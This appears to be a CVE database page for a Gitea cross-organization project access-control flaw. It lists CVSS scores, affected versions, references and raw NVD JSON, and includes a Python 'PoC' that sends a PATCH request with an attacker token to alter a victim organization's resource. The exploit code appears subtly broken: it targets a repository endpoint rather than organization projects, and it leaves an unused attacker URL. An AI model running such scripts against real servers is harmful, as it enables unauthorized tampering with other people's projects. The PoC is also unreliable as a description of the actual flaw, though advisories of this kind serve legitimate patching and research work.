CVE-2026-20750

Description

Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:* - VULNERABLE

Gitea < 1.25.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-20750 PoC - Gitea组织项目访问控制绕过
# This PoC demonstrates the access control bypass in Gitea organization project operations

import requests
import json

TARGET_URL = "http://target-gitea-instance.com"
ATTACKER_TOKEN = "attacker_access_token"
TARGET_ORG_PROJECT_ID = "victim-org-project-id-to-modify"
ATTACKER_ORG_PROJECT_ID = "attacker-org-project-id"

def exploit_cve_2026_20750():
    """
    Exploit for CVE-2026-20750: Gitea improper project ownership validation
    Attacker with write access to one org project can modify projects in different org
    """
    headers = {
        "Authorization": f"token {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Step 1: Identify attacker-controlled project in one organization
    attacker_project = f"{TARGET_URL}/api/v1/repos/attacker-org/{ATTACKER_ORG_PROJECT_ID}"
    
    # Step 2: Craft request to modify victim organization project
    # The vulnerability allows modifying project settings by specifying target project ID
    exploit_payload = {
        "title": "Modified by Attacker via CVE-2026-20750",
        "description": "This project was modified due to improper access control validation"
    }
    
    # Step 3: Send modification request with victim project ID
    # System fails to validate project ownership properly
    modify_url = f"{TARGET_URL}/api/v1/repos/{TARGET_ORG_PROJECT_ID}"
    response = requests.patch(modify_url, headers=headers, json=exploit_payload)
    
    if response.status_code == 200:
        print("[+] SUCCESS: Project modified without proper authorization!")
        print(f"[+] Modified project: {TARGET_ORG_PROJECT_ID}")
        return True
    else:
        print(f"[-] Failed: Status {response.status_code}")
        return False

if __name__ == "__main__":
    print("CVE-2026-20750 Gitea Access Control Bypass PoC")
    exploit_cve_2026_20750()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20750
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20750
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20750/
[4] VulDB https://vuldb.com/cve/CVE-2026-20750
[5] https://blog.gitea.com/release-of-1.25.4/
[6] https://github.com/go-gitea/gitea/pull/36318
[7] https://github.com/go-gitea/gitea/pull/36373
[8] https://github.com/go-gitea/gitea/releases/tag/v1.25.4
[9] https://github.com/go-gitea/gitea/security/advisories/GHSA-h4fh-pc4w-8w27

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20750", "sourceIdentifier": "88ee5874-cf24-4952-aea0-31affedb7ff2", "published": "2026-01-22T22:16:17.370", "lastModified": "2026-01-29T21:48:07.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization."}, {"lang": "es", "value": "Gitea no valida correctamente la titularidad de los proyectos en las operaciones de proyectos de la organización. Un usuario con permisos de escritura en proyectos de una organización podría modificar proyectos pertenecientes a una organización diferente."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.25.4", "matchCriteriaId": "DFCB7D74-331D-4582-AB41-113A25BE8FAA"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.25.4/", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/36318", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/pull/36373", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.25.4", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-h4fh-pc4w-8w27", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Broken Link"]}]}}